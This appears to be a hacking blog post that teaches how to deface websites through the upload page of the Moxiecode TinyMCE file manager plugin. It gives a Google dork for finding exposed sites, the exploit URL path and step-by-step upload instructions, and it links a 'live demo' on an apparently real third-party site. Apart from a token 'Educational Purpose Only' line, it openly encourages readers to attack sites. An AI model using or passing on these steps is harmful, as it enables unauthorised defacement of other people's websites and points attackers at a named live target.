Moxiecode File Browser Vulnerability : Upload Deface Remotly

Here Is Another File Upload And Deface Vulnerability hitting mass Number if website..
Deface It from Ur PC Easily..

Moxiecode File Browser Vulnerability : Upload Deface Remotly

First Of all Enter This Google Dork:

intitle:Moxiecode File browser filetype:php

select Site U wann Deface from search results
The Exploit url will be like this

http://[site]/../../js/tiny_mce/plugins/filemanager/upload.php

Live Demo :
http://www.steulaliegites.com/tinymce/jscripts/tiny_mce/plugins/filemanager/frameset.php

Note: Educational Purpose Only.

After Going to This page see icons in header of page, serach for upload
new file icon.
after clicking on Upload new file icon you’ll see a new pop up for upload new files
for Preview your uploaded file go to : site.com/images/urfile if you uploaded a image
and if you have uploded .html file see it here

site.com/files/deface.html
or
http://[site]/../../js/tiny_mce/plugins/filemanager/files/deface.html

Keep Hacking 😉
Keep Visiting Darksite..don’t forget to check my non-technical WebSite ..:)

Do Share+Comments+Likes Thanks

Reference:Here

error: Content is protected !!